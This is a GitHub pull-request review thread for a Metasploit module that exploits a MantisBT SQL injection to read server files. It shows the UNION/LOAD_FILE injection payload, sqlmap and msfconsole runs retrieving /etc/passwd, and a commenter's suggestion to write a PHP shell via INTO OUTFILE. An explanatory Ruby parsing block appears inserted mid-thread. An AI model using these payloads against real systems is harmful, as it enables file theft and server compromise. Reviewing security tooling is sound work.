
Conversation

brandonprry
Contributor

http://www.mantisbt.org/bugs/view.php?id=17055

This module exploits the above vulnerability to read arbitrary files from the file system.

You can download vulnerable releases here:

http://sourceforge.net/projects/mantisbt/files/mantis-stable/

@brandonprry
Contributor Author

DID YOU KNOW:

Some species of Mantis are only females, and they give birth to exact clones of themselves (asexually).


remove extra new line and fix author line
@brandonprry
Contributor Author

FWIW the version that is fixed is 1.2.17 and has been officially released by the MantisBT team:

http://seclists.org/oss-sec/2014/q1/490


resp.body =~ /qgjuq(.*)qirpq/

file = [$1].pack("H*")


please use .match instead of automatch variables here

Contributor Author


Sure thing.
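The extraction the reviewer is asking for, written out as an added example (not the module's code): a MatchData object instead of the `$1` automatch variable, plus the check a practitioner wants before decoding. The marker strings are the ones in the review context above; the response bodies are constructed here for illustration. Two failure modes are handled: the markers never appear (the UNION did not fire), and the markers wrap only whitespace (MySQL's LOAD_FILE returned NULL because mysqld could not read the file), which `pack('H*')` would otherwise silently turn into a NUL byte and save as loot.

```ruby
# Added example, not code from the module under review.
PREFIX_MARKER = 'qgjuq'
SUFFIX_MARKER = 'qirpq'

# Constructed response bodies for illustration.
SAMPLE_HIT  = "<html><body>qgjuq726f6f743a783a303a30qirpq</body></html>"
SAMPLE_NULL = "<html><body>qgjuq qirpq</body></html>"   # LOAD_FILE() returned NULL
SAMPLE_MISS = "<html><body>no injection here</body></html>"

# Returns the decoded file contents as a binary String, or nil when the
# markers are absent or wrap nothing usable.
def extract_file(body)
  # Non-greedy group: if the page ever echoes the markers twice, a greedy
  # (.*) would swallow everything between the first and last occurrence.
  md = body.match(/#{PREFIX_MARKER}(.*?)#{SUFFIX_MARKER}/m)
  return nil unless md

  hex = md[1].strip
  return nil if hex.empty?

  # pack('H*') maps any non-hex character to a nibble instead of failing,
  # so insist on a well-formed, even-length hex string before decoding.
  return nil unless hex.match?(/\A(?:[0-9a-fA-F]{2})+\z/)

  [hex].pack('H*')
end
```

Calling `extract_file(SAMPLE_HIT)` yields `"root:x:0:0"`, while the NULL and miss cases both return `nil`, so the caller can report "file not readable" rather than writing an empty loot file.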

@wchen-r7
Contributor

wchen-r7 commented Mar 4, 2014

msftidy run:

$ tools/msftidy.rb modules/auxiliary/gather/mantisbt_admin_sqli.rb 
modules/auxiliary/gather/mantisbt_admin_sqli.rb:70 - [WARNING] Line exceeding 200 bytes
modules/auxiliary/gather/mantisbt_admin_sqli.rb - [WARNING] Module contains old license comment, use tools/dev/resplat.rb <filename>

@brandonprry
Contributor Author

All of the comments should be addressed now. Let me know if you see any more issues!

Sent from a computer


[
OptString.new('FILEPATH', [ true, 'Path to remote file', '/etc/passwd']),
OptString.new('USERNAME', [ true, 'Single username', 'administrator']),
OptString.new('PASSWORD', [ true, 'Single password', 'password']),
Contributor


Which version uses the default password "password"? I'm testing on 1.2.16 and the default password is "root".

Contributor Author


The default password is not password. Sorry, that is a remnant of development. Let me change it to root.

Contributor


Thanks.

@wchen-r7 wchen-r7 self-assigned this Mar 4, 2014
@wchen-r7
Contributor

wchen-r7 commented Mar 4, 2014

I tried to read a different file other than /etc/passwd, and I'd get nothing: 'qgjuq qirpq'. For example: I created a file like this: echo hello > /tmp/test.txt, and then on msfconsole I did set filepath /tmp/test.txt, I got nothing.

Can you please try to read a different file and see if it works?

@brandonprry
Contributor Author

Yes, but it may be a bit before I can test... That is odd, I am sure I had tested that.

@brandonprry
Contributor Author

Testing now, give me a few

@brandonprry
Contributor Author

You are right, it looks like it has issues with other files, but I am not sure why. Even sqlmap cannot download anything except the /etc/passwd file, which is quite weird. Still digging...

bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --skip=save,filter_user_id,filter_project_id --technique=u --union-char=11 --file-read=/tmp/passwd

    sqlmap/1.0-dev-f97fcb7 - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 13:35:57

[13:35:57] [INFO] parsing HTTP request from '/tmp/req.req'
[13:35:57] [INFO] resuming back-end DBMS 'mysql' 
[13:35:57] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: filter_config_id
    Type: UNION query
    Title: MySQL UNION query (11) - 6 columns
    Payload: save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-9959' UNION ALL SELECT 11,11,11,11,CONCAT(0x71676a7571,0x5558706e456e484d715a,0x7169727071),11#&apply_filter_button=Apply Filter
---
[13:35:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: PHP 5.4.9, Apache 2.2.22
back-end DBMS: MySQL 5
[13:35:57] [INFO] fingerprinting the back-end DBMS operating system
[13:35:57] [INFO] the back-end DBMS operating system is Linux
[13:35:57] [INFO] fetching file: '/tmp/passwd'
[13:35:57] [WARNING] there was a problem decoding value '  ' from expected hexadecimal form
do you want confirmation that the remote file '/tmp/passwd' has been successfully downloaded from the back-end DBMS file system? [Y/n] y
[13:36:05] [WARNING] reflective value(s) found and filtering out
[13:36:05] [WARNING] it looks like the file has not been written, this can occur if the DBMS process' user has no write privileges in the destination path
files saved to [1]:
[*] /home/bperry/tools/sqlmap/output/172.31.16.109/files/_tmp_passwd (size differs from remote file)

[13:36:05] [INFO] fetched data logged to text files under '/home/bperry/tools/sqlmap/output/172.31.16.109'

[*] shutting down at 13:36:05

bperry@ubuntu:~/tools/sqlmap$ cat /home/bperry/tools/sqlmap/output/172.31.16.109/files/_tmp_passwd
bperry@ubuntu:~/tools/sqlmap$ 

@brandonprry
Contributor Author

I believe we are running into this bug:

http://bugs.mysql.com/bug.php?id=38403

Going to install on CentOS and see if that changes the behavior. LOAD_FILE is apparently very buggy.

FWIW I tried disabling apparmor as well to no avail. IIRC my original testing was on centos 6.5, and I am sure that /tmp was able to be read from.

@brandonprry
Contributor Author

BTW I am assuming you threw together an Ubuntu vm to repro this?

@wchen-r7
Contributor

wchen-r7 commented Mar 4, 2014

Yeah, Ubuntu 12.04.4 LTS

@brandonprry
Contributor Author

Yep, throwing up a CentOS vm now, will install and test. Give me a few. Should have results by 5.

@infodox

infodox commented Mar 4, 2014

Uh. If you can do a SELECT LOAD_FILE("/etc/passwd"); you can do a SELECT "" INTO OUTFILE "/some/writeable/web/dir/file.php"; and just drop a shellstager... Right? So why not that?

@wchen-r7
Contributor

wchen-r7 commented Mar 4, 2014

@infodox That is assuming you have WRITE permission and that AppArmor allows it, which it doesn't by default.

@brandonprry
Contributor Author

Yes, I cannot write to the FS, only read. On CentOS (with SELinux disabled) I can read files from /tmp as well.

msf auxiliary(mantisbt_admin_sqli) > show options

Module options (auxiliary/gather/mantisbt_admin_sqli):

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   FILEPATH   /tmp/fdsa          yes       Path to remote file
   PASSWORD   root               yes       Single password
   Proxies                       no        Use a proxy chain
   RHOST      172.31.16.115      yes       The target address
   RPORT      80                 yes       The target port
   TARGETURI  /mantisbt-1.2.16/  yes       Relative URI of MantisBT installation
   USERNAME   administrator      yes       Single username
   VHOST                         no        HTTP server virtual host

msf auxiliary(mantisbt_admin_sqli) > run

[+] File saved to: /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt
[*] Auxiliary module execution completed
msf auxiliary(mantisbt_admin_sqli) > cat /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt
[*] exec: cat /home/bperry/.msf4/loot/20140304143918_default_172.31.16.115_mantisbt.file_538855.txt

This is a tmp file
msf auxiliary(mantisbt_admin_sqli) > 

@wchen-r7
Contributor

wchen-r7 commented Mar 4, 2014

Ok, so that's probably an issue with load_file on ubuntu then. Since that's the only problem I've found and it's not your fault, I'd like to go ahead and land it if you don't mind.

@brandonprry
Contributor Author

Go for it!

Sent from a computer


@wchen-r7 wchen-r7 merged commit c86764d into rapid7:master Mar 4, 2014
5 participants